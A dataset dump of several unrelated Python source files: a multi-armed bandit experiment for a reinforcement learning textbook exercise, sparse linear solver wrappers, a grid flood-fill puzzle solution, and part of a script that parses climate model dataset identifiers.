reward\n self.num_sel[action_idx] += 1\n self.qn[action_idx] = self.rewards_total[action_idx] / self.num_sel[action_idx]\n\n\nclass GreedyNonStationary:\n def __init__(self, alpha=0.1, init_value=5, k=10):\n self.alpha = alpha\n self.k = k\n self.t0 = True\n self.qn = [init_value] * k\n\n def get_action(self):\n if self.t0:\n action = random.randint(0, self.k - 1)\n self.t0 = False\n else:\n maxval = max(self.qn)\n possible_actions = [idx for idx, val in enumerate(self.qn) if val == maxval]\n action = random.sample(possible_actions, k=1)[0]\n\n return action\n\n def register_reward(self, action_idx, reward):\n self.qn[action_idx] = self.qn[action_idx] + self.alpha * (reward - self.qn[action_idx])\n\n\nclass GradientBandit:\n def __init__(self, alpha=0.1, k=10):\n self.alpha = alpha\n self.k = k\n self.t = 0\n self.rewards_total = 0.0\n self.h = [0.0] * k\n self.pi_t = [1.0 / k] * k\n\n def 
get_action(self):\n return random.choices(list(range(self.k)), weights=self.pi_t)[0]\n\n def register_reward(self, action_idx, reward):\n self.rewards_total += reward\n self.t += 1\n self.softmax()\n average_reward = self.rewards_total / self.t\n for i in range(self.k):\n if i == action_idx:\n self.h[i] += self.alpha * (reward - average_reward) * (1 - self.pi_t[i])\n else:\n self.h[i] -= self.alpha * (reward - average_reward) * self.pi_t[i]\n\n def softmax(self):\n denominator = sum([math.e ** self.h[i] for i in range(self.k)])\n for idx in range(self.k):\n numerator = math.e ** self.h[idx]\n self.pi_t[idx] = numerator / denominator\n\n\nclass UCB:\n \"\"\" \"\"\"\n\n def __init__(self, c, init_value=0, k=10):\n \"\"\"\n c is > 0, and controls degree of exploration\n \"\"\"\n self.k = k\n self.c = c\n self.t = 0\n self.last_reward = [init_value] * k\n self.num_sel = [0] * k\n self.A = [100000] * k # arbitrarily large action optimality estimate, encourages exploration\n\n def get_action(self):\n\n # find max value in action optimality array\n maxval = max(self.A)\n\n # in case there are multiple actions with same maxval, choose randomly among them\n idxes = [x for x, val in enumerate(self.A) if val == maxval]\n return random.sample(idxes, k=1)[0]\n\n def register_reward(self, action_idx, reward):\n\n # update counters\n self.num_sel[action_idx] += 1\n self.t += 1\n\n # compute Q_(n+1) = Q_n + 1/N(A) * (R_n - Q_n)\n qnp1 = self.last_reward[action_idx] + 1 / self.num_sel[action_idx] * (reward - self.last_reward[action_idx])\n self.last_reward[action_idx] = qnp1\n\n # update action optimality estimates\n self.A[action_idx] = qnp1 + self.c * sqrt(log(self.t) / self.num_sel[action_idx])\n\n\ndef run_trial(Model, Agent, *args, num_trials=2000, num_timesteps=1000, avg_from=0, avg_to=1000):\n\n avg_rewards = []\n\n start = time.time()\n for n in range(num_trials):\n\n model = Model()\n agent = Agent(*args)\n\n rewards = []\n\n for _ in range(num_timesteps):\n\n action = agent.get_action()\n reward = model.reward(action)\n agent.register_reward(action, reward)\n rewards.append(reward)\n\n rewards = rewards[avg_from:avg_to]\n avg_reward = sum(rewards) / len(rewards)\n avg_rewards.append(avg_reward)\n\n if n > 0 and n % 10 == 0:\n rtime = time.time() - start\n remaining = (num_trials - n) * rtime / 10 / 60\n print(\n \"\\t--> Completed %d trials, runtime = %.3f, estimated remaining time = %.3f mins\"\n % (n, rtime, remaining)\n )\n start = time.time()\n\n return sum(avg_rewards) / num_trials\n\n\ndef test_stationary_cases(k=10):\n \"\"\"\n K-armed bandit tested on the stationary environment case\n\n This re-creates the Figure 2.6 found on page 42 of Richard Sutton's\n Reinforcement Learning (2nd edition) textbook.\n \"\"\"\n\n s = \"method,power,value\\n\"\n # run 'epsilon-greedy' experiments\n for power in range(-7, -1, 1):\n epsilon = 2 ** power\n v = run_trial(StationaryEnvironmentModel, EpsilonGreedy, epsilon, k, 0)\n print(\"[Episilon-Greedy, epsilon = 1/%d] Average Reward = %.3f\" % (2 ** (abs(power)), v))\n s += str(\"epsilon-greedy,%d,%.3f\\n\" % (power, v))\n\n # run 'optimistic-greedy' experiments\n for power in range(-2, 3, 1):\n initialization = 2 ** power\n v = run_trial(StationaryEnvironmentModel, GreedyNonStationary, 0.1, initialization, k)\n print(\"[Optimistic-Greedy, initialization = %.5f] Average Reward = %.3f\" % (initialization, v))\n s += str(\"opt-greedy,%d,%.3f\\n\" % (power, v))\n\n # run 'UCB' experiments\n for power in range(-4, 3, 1):\n c = 2 ** power\n v = 
run_trial(StationaryEnvironmentModel, UCB, c, 0, k)\n print(\"[UCB, c = %.5f] Average Reward = %.3f\" % (c, v))\n s += str(\"ucb,%d,%.3f\\n\" % (power, v))\n\n # run 'GradientBandit' experiments\n for power in range(-5, 3, 1):\n alpha = 2 ** power\n v = run_trial(StationaryEnvironmentModel, GradientBandit, alpha, k)\n print(\"[Gradient Bandit, alpha = %.5f] Average Reward = %.3f\" % (alpha, v))\n s += str(\"gradient-bandit,%d,%.3f\\n\" % (power, v))\n\n with open(\"stationary_results.csv\", \"w\") as fp:\n fp.write(s)\n\n\ndef test_nonstationary_cases(k=10):\n \"\"\"\n K-armed bandit tested on the non-stationary environment case\n\n This is Exercise 2.11 on page 44 of R. Sutton Reinforcement Learning (2nd\n Edition) book.\n\n Exercise 2.11: Make a figure analogous to Figure 2.6 for the nonstationary case\n outlined in Exercise 2.5. Include the constant-step-size epsilon-greedy\n algorithm with alpha = 0.1. Use runs of 200,000 steps and, as a performance\n measure for each algorithm and parameter setting, use the average reward over\n the last 100,000 steps.\n \"\"\"\n\n s = \"method,power,value\\n\"\n # run 'epsilon-greedy' experiments\n for power in range(-7, -1, 1):\n epsilon = 2 ** power\n v = run_trial(\n NonStationaryEnvironmentModel,\n EpsilonGreedy,\n epsilon,\n k,\n 0,\n num_trials=100,\n num_timesteps=200000,\n avg_from=100000,\n avg_to=200000,\n )\n print(\"[Episilon-Greedy, epsilon = 1/%d] Average Reward = %.3f\" % (2 ** (abs(power)), v))\n s += str(\"epsilon-greedy,%d,%.3f\\n\" % (power, v))\n\n # run 'optimistic-greedy' experiments\n for power in range(-2, 3, 1):\n initialization = 2 ** power\n v = run_trial(\n NonStationaryEnvironmentModel,\n GreedyNonStationary,\n 0.1,\n initialization,\n k,\n num_trials=100,\n num_timesteps=200000,\n avg_from=100000,\n avg_to=200000,\n )\n print(\"[Optimistic-Greedy, initialization = %.5f] Average Reward = %.3f\" % (initialization, v))\n s += str(\"opt-greedy,%d,%.3f\\n\" % (power, v))\n\n # run 'UCB' experiments\n for power in range(-4, 3, 1):\n c = 2 ** power\n v = run_trial(\n NonStationaryEnvironmentModel,\n UCB,\n c,\n 0,\n k,\n num_trials=100,\n num_timesteps=200000,\n avg_from=100000,\n avg_to=200000,\n )\n print(\"[UCB, c = %.5f] Average Reward = %.3f\" % (c, v))\n s += str(\"ucb,%d,%.3f\\n\" % (power, v))\n\n # run 'GradientBandit' experiments\n for power in range(-5, 3, 1):\n alpha = 2 ** power\n v = run_trial(\n NonStationaryEnvironmentModel,\n GradientBandit,\n alpha,\n k,\n num_trials=100,\n num_timesteps=200000,\n avg_from=100000,\n avg_to=200000,\n )\n print(\"[Gradient Bandit, alpha = %.5f] Average Reward = %.3f\" % (alpha, v))\n s += str(\"gradient-bandit,%d,%.3f\\n\" % (power, v))\n\n with open(\"nonstationary_results.csv\", \"w\") as fp:\n fp.write(s)\n\n\ndef main():\n test_stationary_cases()\n test_nonstationary_cases()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"sidmontu/ch-ss","sub_path":"ai/ref/sutton_rl/chapter_02/exercise_2.11.py","file_name":"exercise_2.11.py","file_ext":"py","file_size_in_byte":10120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"88"} +{"seq_id":"31244876788","text":"from __future__ import print_function\nimport numpy as np\nfrom scipy.sparse import linalg\nfrom .matutils import mkvc\nimport warnings\n\ndef _checkAccuracy(A, b, X, accuracyTol):\n nrm = np.linalg.norm(mkvc(A*X - b), np.inf)\n nrm_b = np.linalg.norm(mkvc(b), np.inf)\n if nrm_b > 0:\n nrm /= nrm_b\n if nrm > accuracyTol:\n msg = '### SolverWarning ###: Accuracy on solve 
is above tolerance: {0:e} > {1:e}'.format(nrm, accuracyTol)\n print(msg)\n warnings.warn(msg, RuntimeWarning)\n\n\ndef SolverWrapD(fun, factorize=True, checkAccuracy=True, accuracyTol=1e-6, name=None):\n \"\"\"\n Wraps a direct Solver.\n\n ::\n\n import scipy.sparse as sp\n Solver = SolverUtils.SolverWrapD(sp.linalg.spsolve, factorize=False)\n SolverLU = SolverUtils.SolverWrapD(sp.linalg.splu, factorize=True)\n\n \"\"\"\n\n def __init__(self, A, **kwargs):\n self.A = A.tocsc()\n\n self.checkAccuracy = kwargs.get(\"checkAccuracy\", checkAccuracy)\n if \"checkAccuracy\" in kwargs: del kwargs[\"checkAccuracy\"]\n self.accuracyTol = kwargs.get(\"accuracyTol\", accuracyTol)\n if \"accuracyTol\" in kwargs: del kwargs[\"accuracyTol\"]\n\n self.kwargs = kwargs\n\n if factorize:\n self.solver = fun(self.A, **kwargs)\n\n def __mul__(self, b):\n if type(b) is not np.ndarray:\n raise TypeError('Can only multiply by a numpy array.')\n\n if len(b.shape) == 1 or b.shape[1] == 1:\n b = b.flatten()\n # Just one RHS\n\n if b.dtype is np.dtype('O'):\n b = b.astype(type(b[0]))\n\n if factorize:\n X = self.solver.solve(b, **self.kwargs)\n else:\n X = fun(self.A, b, **self.kwargs)\n else: # Multiple RHSs\n if b.dtype is np.dtype('O'):\n b = b.astype(type(b[0,0]))\n\n X = np.empty_like(b)\n\n for i in range(b.shape[1]):\n if factorize:\n X[:,i] = self.solver.solve(b[:,i])\n else:\n X[:,i] = fun(self.A, b[:,i], **self.kwargs)\n\n if self.checkAccuracy:\n _checkAccuracy(self.A, b, X, self.accuracyTol)\n return X\n\n def clean(self):\n if factorize and hasattr(self.solver, 'clean'):\n return self.solver.clean()\n\n return type(name if name is not None else fun.__name__, (object,), {\"__init__\": __init__, \"clean\": clean, \"__mul__\": __mul__})\n\n\n\ndef SolverWrapI(fun, checkAccuracy=True, accuracyTol=1e-5, name=None):\n \"\"\"\n Wraps an iterative Solver.\n\n ::\n\n import scipy.sparse as sp\n SolverCG = SolverUtils.SolverWrapI(sp.linalg.cg)\n\n \"\"\"\n\n def __init__(self, A, **kwargs):\n self.A = A\n\n self.checkAccuracy = kwargs.get(\"checkAccuracy\", checkAccuracy)\n if \"checkAccuracy\" in kwargs: del kwargs[\"checkAccuracy\"]\n self.accuracyTol = kwargs.get(\"accuracyTol\", accuracyTol)\n if \"accuracyTol\" in kwargs: del kwargs[\"accuracyTol\"]\n\n self.kwargs = kwargs\n\n def __mul__(self, b):\n if type(b) is not np.ndarray:\n raise TypeError('Can only multiply by a numpy array.')\n\n if len(b.shape) == 1 or b.shape[1] == 1:\n b = b.flatten()\n # Just one RHS\n out = fun(self.A, b, **self.kwargs)\n if type(out) is tuple and len(out) == 2:\n # We are dealing with scipy output with an info!\n X = out[0]\n self.info = out[1]\n else:\n X = out\n else: # Multiple RHSs\n X = np.empty_like(b)\n for i in range(b.shape[1]):\n out = fun(self.A, b[:,i], **self.kwargs)\n if type(out) is tuple and len(out) == 2:\n # We are dealing with scipy output with an info!\n X[:,i] = out[0]\n self.info = out[1]\n else:\n X[:,i] = out\n\n if self.checkAccuracy:\n _checkAccuracy(self.A, b, X, self.accuracyTol)\n return X\n\n def clean(self):\n pass\n\n return type(name if name is not None else fun.__name__, (object,), {\"__init__\": __init__, \"clean\": clean, \"__mul__\": __mul__})\n\n\nSolver = SolverWrapD(linalg.spsolve, factorize=False, name=\"Solver\")\nSolverLU = SolverWrapD(linalg.splu, factorize=True, name=\"SolverLU\")\nSolverCG = SolverWrapI(linalg.cg, name=\"SolverCG\")\nSolverBiCG = SolverWrapI(linalg.bicgstab, name=\"SolverBiCG\")\n\nclass SolverDiag(object):\n \"\"\"docstring for SolverDiag\"\"\"\n def 
__init__(self, A):\n self.A = A\n self._diagonal = A.diagonal()\n\n def __mul__(self, rhs):\n n = self.A.shape[0]\n assert rhs.size % n == 0, 'Incorrect shape of rhs.'\n nrhs = rhs.size // n\n\n if len(rhs.shape) == 1 or rhs.shape[1] == 1:\n x = self._solve1(rhs)\n else:\n x = self._solveM(rhs)\n\n if nrhs == 1:\n return x.flatten()\n elif nrhs > 1:\n return x.reshape((n,nrhs), order='F')\n\n def _solve1(self, rhs):\n return rhs.flatten()/self._diagonal\n\n def _solveM(self, rhs):\n n = self.A.shape[0]\n nrhs = rhs.size // n\n return rhs/self._diagonal.repeat(nrhs).reshape((n,nrhs))\n\n def clean(self):\n pass\n","repo_name":"jlartey-aims/Resistivity","sub_path":"SimPEG/Utils/SolverUtils.py","file_name":"SolverUtils.py","file_ext":"py","file_size_in_byte":5303,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"86"} +{"seq_id":"15759184318","text":"class Solution(object):\n def solve(self, board):\n \"\"\"\n :type board: List[List[str]]\n :rtype: void Do not return anything, modify board in-place instead.\n \"\"\"\n if not board:\n return\n m, n = len(board), len(board[0])\n for j in range(n):\n self.aux(board, 0, j)\n self.aux(board, m - 1, j)\n for i in range(1, m - 1):\n self.aux(board, i, 0)\n self.aux(board, i, n - 1)\n\n for i in range(m):\n for j in range(n):\n if board[i][j] == 'O':\n board[i][j] = 'X'\n elif board[i][j] == '+':\n board[i][j] = 'O'\n\n def aux(self, board, i, j):\n q = []\n m, n = len(board), len(board[0])\n if 0 <= i < m and 0 <= j < n and board[i][j] == 'O':\n board[i][j] = '+'\n q.append((i, j))\n while len(q):\n i, j = q.pop(0)\n new = [(i - 1, j), (i + 1, j), (i, j - 1), (i, j + 1)]\n for i, j in new:\n if i < 0 or i >= m or j < 0 or j >= n or board[i][j] != 'O':\n continue\n board[i][j] = '+'\n q.append((i, j))\n","repo_name":"jingro/leetcode","sub_path":"surroundedRegions.py","file_name":"surroundedRegions.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"17073556097","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 4 14:33:10 2021\n\nPJD 6 May 2021 - Regex testing https://regex101.com/\nPJD 6 May 2021 - Update to persistent data file\nPJD 11 May 2021 - Dealt with new directory info\nPJD 13 May 2021 - Update queries, sync with jsonToHtml (order and\n description)\nPJD 13 May 2021 - Reassign actId to decadal* (DCPP)\n sst2030, sst2090 (ScenarioMIP - AMIP rcp45, table 2,\n tier 1, #2.1)\n https://pcmdi.llnl.gov/mips/cmip5/docs/Taylor_CMIP5_design.pdf#Page=12\n esmFdbk1, esmFdbk2 (C4MIP - carbon feedbacks)\n esmFixClim1, esmFixClim2 (C4MIP - radiation feedbacks)\n historicalExt (CMIP - extension beyond 2005)\n historicalGHG, historicalMisc, historicalNat (DAMIP)\n https://pcmdi.llnl.gov/mips/cmip5/docs/cmip5_data_reference_syntax_v1-02_marked.pdf\nPJD 13 May 2021 - queries, add cpocean (specific heat capacity, realign to\n Griffies et al., 2016 GMD)\nPJD 18 May 2021 - Correct institution_id mappings (instRemap)\n https://github.com/durack1/CMIPOcean/issues/6\nPJD 18 May 2021 - Collapse all decadal* exps into DCPP actId,\n esmCon*/esmHist* to CMIP, esmrcp* to ScenarioMIP,\n midHolocene + past1000 to PMIP,\n noVolcXXXX + volcInXXXX to VolMIP\n https://github.com/durack1/CMIPOcean/issues/6\nPJD 18 May 2021 - update key 'aerosol indirect effects' -> 'sulphate aer*'\nPJD 18 May 2021 - Added modId 'ocean model id (+ version)'\nPJD 21 Jun 2021 - Added geothermal heating (geotHt)\n TODO: 
add version info\n\n@author: durack1\n\"\"\"\n\n# %% Imports\nimport datetime\nimport json\nimport os\nimport re\nimport sys\nimport time\n\n# %% functions\n\n\ndef siftBits(tmpId):\n \"\"\"\n\n Parameters\n ----------\n tmpId : TYPE\n DESCRIPTION.\n\n Returns\n -------\n mipEra : TYPE\n DESCRIPTION.\n actId : TYPE\n DESCRIPTION.\n instId : TYPE\n DESCRIPTION.\n srcId : TYPE\n DESCRIPTION.\n expId : TYPE\n DESCRIPTION.\n ripfId : TYPE\n DESCRIPTION.\n tabId : TYPE\n DESCRIPTION.\n varId : TYPE\n DESCRIPTION.\n gridId : TYPE\n DESCRIPTION.\n verId : TYPE\n DESCRIPTION.\n nodeId : TYPE\n DESCRIPTION.\n\n \"\"\"\n # CMIP6.ScenarioMIP.NCAR.CESM2-WACCM.ssp126.r1i1p1f1.Oday.tos.gn.v20190815|esgf-data3.ceda.ac.uk\n # cmip5.output1.NOAA-GFDL.GFDL-ESM2M.historicalMisc.day.ocean.day.r1i1p3.v20110601|aims3.llnl.gov\n # cmip3.GFDL.gfdl_cm2_0.historical.mon.ocean.run3.tos.v1|aims3.llnl.gov\n docId = tmpId.split('|')\n modId = docId[0].split('.')\n mipEra = modId[0].upper()\n # validate mipEra\n mipTest = re.compile('^CMIP\\d{1}')\n if not mipTest.match(mipEra):\n print('** mipEra format invalid - mipTest: ', mipEra,\n ', exiting.. **')\n sys.exit()\n # Parse dependent on mipEra indexes\n if 'CMIP6' in mipEra:\n actId = modId[1]\n instId = modId[2]\n srcId = modId[3]\n # validate srcId\n expId = modId[4]\n ripfId = modId[5]\n ripfTest = re.compile('^r\\d{1,4}i\\d{1,4}p\\d{1,3}f\\d{1,3}')\n tabId = modId[6]\n varId = modId[7]\n gridId = modId[8]\n verTest = re.compile('^v\\d{8}')\n elif 'CMIP5' in mipEra:\n actId = 'CMIP'\n instId = modId[2]\n srcId = modId[3]\n # validate srcId\n expId = modId[4]\n # Kludge actId from expId\n if expId in ['esmControl', 'esmHistorical']:\n actId = 'CMIP'\n expTest = re.compile('^esmF*')\n tmp = expTest.match(expId)\n if tmp and tmp.span()[1] == 4:\n actId = 'C4MIP'\n if expId in ['historicalGHG', 'historicalMisc', 'historicalNat']:\n actId = 'DAMIP'\n expTest = re.compile('^decadal\\d{1,4}')\n if expTest.match(expId):\n actId = 'DCPP'\n if expId in ['midHolocene', 'past1000']:\n actId = 'PMIP'\n expTest = re.compile('^esmrcp\\d{1,2}')\n if expTest.match(expId):\n actId = 'ScenarioMIP'\n expTest = re.compile('^rcp\\d{1,2}')\n if expTest.match(expId):\n actId = 'ScenarioMIP'\n expTest = re.compile('^sst20\\d{1,2}')\n if expTest.match(expId):\n actId = 'ScenarioMIP'\n expTest = re.compile('^noVolc\\d{1,4}')\n if expTest.match(expId):\n actId = 'VolMIP'\n expTest = re.compile('^volcIn\\d{1,4}')\n if expTest.match(expId):\n actId = 'VolMIP'\n # Kludge - poor indexes, missing tableId\n if ('CCCma' in instId and 'CanCM4' in srcId and\n 'v20130331' in modId[-1]\n and expId in ['decadal1960', 'decadal1961', 'decadal1962',\n 'decadal1963', 'decadal1964', 'decadal1965',\n 'decadal1966', 'decadal1967', 'decadal1968',\n 'decadal1969', 'decadal1970', 'decadal1971',\n 'decadal1972', 'decadal1973', 'decadal1974',\n 'decadal1975', 'decadal1976', 'decadal1977',\n 'decadal1978', 'decadal1979', 'decadal1980',\n 'decadal1981', 'decadal1982', 'decadal1983',\n 'decadal1984', 'decadal1985', 'decadal1986',\n 'decadal1987', 'decadal1988', 'decadal1989',\n 'decadal1990', 'decadal1991', 'decadal1992',\n 'decadal1993', 'decadal1994', 'decadal1995',\n 'decadal1996', 'decadal1997', 'decadal1998',\n 'decadal1999', 'decadal2000', 'decadal2001',\n 'decadal2002', 'decadal2003', 'decadal2004',\n 'decadal2005', 'decadal2006', 'decadal2007',\n 'decadal2008', 'decadal2009', 'decadal2010',\n 'decadal2011', 'decadal2012', 'decadal2013',\n 'decadal2014', 'decadal2015',\n 'historical', 'rcp45']) or\\\n ('CCCma' 
in instId and 'CanESM2' in srcId and\n 'v20130331' in modId[-1]\n and expId in ['1pctCO2', 'abrupt4xCO2', 'esmControl', 'esmFdbk1',\n 'esmFdbk2', 'esmFixClim1', 'esmFixClim2',\n 'esmHistorical', 'esmrcp85', 'historical',\n 'historicalExt', 'historicalGHG', 'historicalMisc',\n 'historicalNat', 'piControl',\n 'rcp26', 'rcp45', 'rcp85']):\n ripfId = modId[7]\n else:\n ripfId = modId[8]\n ripfTest = re.compile('^r\\d{1,2}i\\d{1,2}p\\d{1,3}')\n tabId = '.'.join([modId[6], modId[5]])\n varId = None # solr scrape was 'tos'\n gridId = None\n verTest = re.compile('^v\\d{1,8}')\n elif 'CMIP3' in mipEra:\n actId = 'CMIP'\n instId = modId[1]\n # Kludge for wrong instId\n if instId in 'CSIRO-QCCCE':\n instId = 'CSIRO'\n srcId = modId[2]\n # validate srcId\n expId = modId[3]\n # Kludge actId from expId\n expTest = re.compile('^sres[a-b]\\d')\n if expTest.match(expId):\n actId = 'ScenarioMIP'\n ripfId = modId[6]\n ripfTest = re.compile('^run\\d{1}')\n tabId = '.'.join([modId[5], modId[4]])\n varId = modId[7]\n gridId = None\n verTest = re.compile('^v\\d{1}')\n pass\n # Get generics and validate\n verId = modId[-1]\n nodeId = docId[1]\n # Remap institutions to CMIP6\n instId = instRemap(instId)\n # Print for testing\n # print('mipEra:', mipEra)\n # print('actId:', actId)\n # print('instId:', instId)\n # print('srcId:', srcId)\n # print('expId:', expId)\n # print('ripfId:', ripfId)\n # print('tabId:', tabId)\n # print('varId:', varId)\n # print('gridId:', gridId)\n # print('verId:', verId)\n # print('nodeId:', nodeId)\n # pdb.set_trace()\n # validate ripfId\n if not ripfTest.match(ripfId):\n print('** ripfId format invalid - ripfTest: ', ripfId,\n ', exiting.. **')\n sys.exit()\n # validate verId\n if not verTest.match(verId):\n print('** verId format invalid - verTest: ', verId,\n ', exiting.. 
**')\n sys.exit()\n\n return mipEra, actId, instId, srcId, expId, ripfId, tabId, varId, gridId,\\\n verId, nodeId\n\n\ndef instRemap(instId):\n \"\"\"\n\n Parameters\n ----------\n instId : TYPE\n DESCRIPTION.\n\n Returns\n -------\n instId : TYPE\n DESCRIPTION.\n\n \"\"\"\n # Create CMIP6 alias for earlier mipEras\n if instId in ['CAS', 'IAP', 'LASG-CESS', 'LASG-IAP']:\n instId = 'CAS'\n if instId in ['CMCC', 'INGV']:\n instId = 'CMCC'\n if instId in ['CRNM_CERFACS', 'CNRM-CERFACS']:\n instId = 'CNRM-CERFACS'\n if instId in ['CSIRO', 'CSIRO-BOM']:\n instId = 'CSIRO'\n if instId in ['EC-Earth-Consortium', 'ICHEC']:\n instId = 'EC-Earth-Consortium'\n if instId in ['FIO-QLNM', 'FIO']:\n instId = 'FIO-QLNM'\n if instId in ['NCAR', 'NSF-DOE-NCAR']:\n instId = 'NCAR'\n if instId in ['NCC', 'BCCR']:\n instId = 'NCC'\n if instId in ['NIMS-KMA', 'NIMR-KMA']:\n instId = 'NIMS-KMA'\n if instId in ['NOAA-GFDL', 'GFDL']:\n instId = 'NOAA-GFDL'\n\n return instId\n\n\n'''\nhttps://github.com/WCRP-CMIP/CMIP6_CVs/blob/master/CMIP6_institution_id.json 210506 1231\n\"AER\":\"Research and Climate Group, Atmospheric and Environmental Research, 131 Hartwell Avenue, Lexington, MA 02421, USA\",\n\"AS-RCEC\":\"Research Center for Environmental Changes, Academia Sinica, Nankang, Taipei 11529, Taiwan\",\n\"AWI\":\"Alfred Wegener Institute, Helmholtz Centre for Polar and Marine Research, Am Handelshafen 12, 27570 Bremerhaven, Germany\",\n\"BCC\":\"Beijing Climate Center, Beijing 100081, China\",\n\"BNU\":\"Beijing Normal University, Beijing 100875, China\",\n\"CAMS\":\"Chinese Academy of Meteorological Sciences, Beijing 100081, China\",\n\"CAS\":\"Chinese Academy of Sciences, Beijing 100029, China\",\n\"CCCR-IITM\":\"Centre for Climate Change Research, Indian Institute of Tropical Meteorology Pune, Maharashtra 411 008, India\",\n\"CCCma\":\"Canadian Centre for Climate Modelling and Analysis, Environment and Climate Change Canada, Victoria, BC V8P 5C2, Canada\",\n\"CMCC\":\"Fondazione Centro Euro-Mediterraneo sui Cambiamenti Climatici, Lecce 73100, Italy\",\n\"CNRM-CERFACS\":\"CNRM (Centre National de Recherches Meteorologiques, Toulouse 31057, France), CERFACS (Centre Europeen de Recherche et de Formation Avancee en Calcul Scientifique, Toulouse 31057, France)\",\n\"CSIR-Wits-CSIRO\":\"CSIR (Council for Scientific and Industrial Research - Natural Resources and the Environment, Pretoria, 0001, South Africa), Wits (University of the Witwatersrand - Global Change Institute, Johannesburg 2050, South Africa), CSIRO (Commonwealth Scientific and Industrial Research Organisation, Aspendale, Victoria 3195, Australia)Mailing address: Wits, Global Change Institute, Johannesburg 2050, South Africa\",\n\"CSIRO\":\"Commonwealth Scientific and Industrial Research Organisation, Aspendale, Victoria 3195, Australia\",\n\"CSIRO-ARCCSS\":\"CSIRO (Commonwealth Scientific and Industrial Research Organisation, Aspendale, Victoria 3195, Australia), ARCCSS (Australian Research Council Centre of Excellence for Climate System Science). Mailing address: CSIRO, c/o Simon J. Marsland, 107-121 Station Street, Aspendale, Victoria 3195, Australia\",\n\"CSIRO-COSIMA\":\"CSIRO (Commonwealth Scientific and Industrial Research Organisation, Australia), COSIMA (Consortium for Ocean-Sea Ice Modelling in Australia). Mailing address: CSIRO, c/o Simon J. 
Marsland, 107-121 Station Street, Aspendale, Victoria 3195, Australia\",\n\"DKRZ\":\"Deutsches Klimarechenzentrum, Hamburg 20146, Germany\",\n\"DWD\":\"Deutscher Wetterdienst, Offenbach am Main 63067, Germany\",\n\"E3SM-Project\":\"LLNL (Lawrence Livermore National Laboratory, Livermore, CA 94550, USA); ANL (Argonne National Laboratory, Argonne, IL 60439, USA); BNL (Brookhaven National Laboratory, Upton, NY 11973, USA); LANL (Los Alamos National Laboratory, Los Alamos, NM 87545, USA); LBNL (Lawrence Berkeley National Laboratory, Berkeley, CA 94720, USA); ORNL (Oak Ridge National Laboratory, Oak Ridge, TN 37831, USA); PNNL (Pacific Northwest National Laboratory, Richland, WA 99352, USA); SNL (Sandia National Laboratories, Albuquerque, NM 87185, USA). Mailing address: LLNL Climate Program, c/o David C. Bader, Principal Investigator, L-103, 7000 East Avenue, Livermore, CA 94550, USA\",\n\"EC-Earth-Consortium\":\"AEMET, Spain; BSC, Spain; CNR-ISAC, Italy; DMI, Denmark; ENEA, Italy; FMI, Finland; Geomar, Germany; ICHEC, Ireland; ICTP, Italy; IDL, Portugal; IMAU, The Netherlands; IPMA, Portugal; KIT, Karlsruhe, Germany; KNMI, The Netherlands; Lund University, Sweden; Met Eireann, Ireland; NLeSC, The Netherlands; NTNU, Norway; Oxford University, UK; surfSARA, The Netherlands; SMHI, Sweden; Stockholm University, Sweden; Unite ASTR, Belgium; University College Dublin, Ireland; University of Bergen, Norway; University of Copenhagen, Denmark; University of Helsinki, Finland; University of Santiago de Compostela, Spain; Uppsala University, Sweden; Utrecht University, The Netherlands; Vrije Universiteit Amsterdam, the Netherlands; Wageningen University, The Netherlands. Mailing address: EC-Earth consortium, Rossby Center, Swedish Meteorological and Hydrological Institute/SMHI, SE-601 76 Norrkoping, Sweden\",\n\"ECMWF\":\"European Centre for Medium-Range Weather Forecasts, Reading RG2 9AX, UK\",\n\"FIO-QLNM\":\"FIO (First Institute of Oceanography, Ministry of Natural Resources, Qingdao 266061, China), QNLM (Qingdao National Laboratory for Marine Science and Technology, Qingdao 266237, China)\",\n\"HAMMOZ-Consortium\":\"ETH Zurich, Switzerland; Max Planck Institut fur Meteorologie, Germany; Forschungszentrum Julich, Germany; University of Oxford, UK; Finnish Meteorological Institute, Finland; Leibniz Institute for Tropospheric Research, Germany; Center for Climate Systems Modeling (C2SM) at ETH Zurich, Switzerland\",\n\"INM\":\"Institute for Numerical Mathematics, Russian Academy of Science, Moscow 119991, Russia\",\n\"INPE\":\"National Institute for Space Research, Cachoeira Paulista, SP 12630-000, Brazil\",\n\"IPSL\":\"Institut Pierre Simon Laplace, Paris 75252, France\",\n\"KIOST\":\"Korea Institute of Ocean Science and Technology, Busan 49111, Republic of Korea\",\n\"LLNL\":\"Lawrence Livermore National Laboratory, Livermore, CA 94550, USA. Mailing address: LLNL Climate Program, c/o Stephen A. 
Klein, Principal Investigator, L-103, 7000 East Avenue, Livermore, CA 94550, USA\",\n\"MESSy-Consortium\":\"The Modular Earth Submodel System (MESSy) Consortium, represented by the Institute for Physics of the Atmosphere, Deutsches Zentrum fur Luft- und Raumfahrt (DLR), Wessling, Bavaria 82234, Germany\",\n\"MIROC\":\"JAMSTEC (Japan Agency for Marine-Earth Science and Technology, Kanagawa 236-0001, Japan), AORI (Atmosphere and Ocean Research Institute, The University of Tokyo, Chiba 277-8564, Japan), NIES (National Institute for Environmental Studies, Ibaraki 305-8506, Japan), and R-CCS (RIKEN Center for Computational Science, Hyogo 650-0047, Japan)\",\n\"MOHC\":\"Met Office Hadley Centre, Fitzroy Road, Exeter, Devon, EX1 3PB, UK\",\n\"MPI-M\":\"Max Planck Institute for Meteorology, Hamburg 20146, Germany\",\n\"MRI\":\"Meteorological Research Institute, Tsukuba, Ibaraki 305-0052, Japan\",\n\"NASA-GISS\":\"Goddard Institute for Space Studies, New York, NY 10025, USA\",\n\"NASA-GSFC\":\"NASA Goddard Space Flight Center, Greenbelt, MD 20771, USA\",\n\"NCAR\":\"National Center for Atmospheric Research, Climate and Global Dynamics Laboratory, 1850 Table Mesa Drive, Boulder, CO 80305, USA\",\n\"NCC\":\"NorESM Climate modeling Consortium consisting of CICERO (Center for International Climate and Environmental Research, Oslo 0349), MET-Norway (Norwegian Meteorological Institute, Oslo 0313), NERSC (Nansen Environmental and Remote Sensing Center, Bergen 5006), NILU (Norwegian Institute for Air Research, Kjeller 2027), UiB (University of Bergen, Bergen 5007), UiO (University of Oslo, Oslo 0313) and UNI (Uni Research, Bergen 5008), Norway. Mailing address: 